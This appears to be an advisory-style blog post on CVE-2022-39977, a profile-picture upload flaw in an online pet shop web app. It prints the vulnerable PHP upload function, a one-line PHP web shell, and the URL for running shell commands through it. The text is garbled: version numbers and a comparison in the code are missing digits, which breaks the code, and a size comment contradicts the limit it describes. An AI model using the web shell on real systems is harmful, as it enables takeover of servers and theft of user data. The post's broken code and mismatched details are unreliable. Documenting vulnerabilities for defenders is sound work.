CVE-2022-39977: Arbitrary File Upload Vulnerability Found in Online Pet Shop Web App v1. Leading to Remote Code Execution with a PHP File

A critical security vulnerability, identified as CVE-2022-39977, has been discovered in the Online Pet Shop Web App version 1.. This vulnerability allows an attacker to execute arbitrary code remotely via a crafted PHP file, which is uploaded through the picture upload point in the User module. As a result, a threat actor could potentially take control of the system, manipulate user accounts, or exploit any other sensitive data related to the pet shop's operations.

In this post, we will explore the details of this vulnerability, including code snippets to understand the exploit better and links to original references for further research.

Vulnerability Details

The arbitrary file upload vulnerability arises from an insecure implementation of the Editing function in the User module. This function permits users to upload images for their profile picture. However, a lack of proper validation checks and file extension restrictions enables an attacker to upload a malicious PHP file. Upon successful upload, this PHP file can then be executed by visiting its URL, resulting in remote code execution (RCE).

Code Snippet

In the vulnerable code for the Editing function, you will notice that the file upload process does not validate the uploaded file type and blindly accepts any file.

// Insecure file upload code snippet:

function uploadProfilePicture() {
  $fileName = $_FILES['picture']['name'];
  $fileTmp = $_FILES['picture']['tmp_name'];
  $fileSize = $_FILES['picture']['size'];
  $fileError = $_FILES['picture']['error'];
  
  $fileExt = explode('.', $fileName);
  $fileActualExt = strtolower(end($fileExt));
  
  // Arbitrary file upload occurs here since file type is not checked
  if ($fileError === ) {
    if ($fileSize < 100000) {
      $fileNameNew = uniqid('', true) . "." . $fileActualExt;
      $fileDestination = 'uploads/' . $fileNameNew;
      move_uploaded_file($fileTmp, $fileDestination);
      return $fileDestination;
    } else {
      // Error message if file size is over 1MB
    }
  } else {
    // Error message if an error occurred when uploading the file
  }
}

To exploit this vulnerability, an attacker can craft a PHP file, such as the following, to execute arbitrary code:

# Malicious PHP file (malicious.php):
<?php
  system($_GET['cmd']);
?>

With this malicious PHP file, they can upload it as their profile picture. Then, they can execute shell commands by visiting https://target-web-app/uploads/malicious.php?cmd=<COMMAND>;.

Below are the links to original references regarding this vulnerability for further study

- CVE-2022-39977 - Arbitrary File Upload Vulnerability in Online Pet Shop Web App v1.

- Exploit-DB Entry for CVE-2022-39977

- Online Pet Shop Web App on GitHub (v1.)

Conclusion

The arbitrary file upload vulnerability in the Online Pet Shop Web App v1., identified as CVE-2022-39977, can lead to severe consequences if exploited by threat actors. To mitigate this issue, the developers should implement proper validation checks and restrict the file type uploads to image formats only.

As a pet shop owner or system administrator, you should update the vulnerable application to the latest version or apply security patches as soon as they become available to ensure the safety of your business and user data.

Timeline

Published on: 10/27/2022 20:15:00 UTC
Last modified on: 10/28/2022 19:07:00 UTC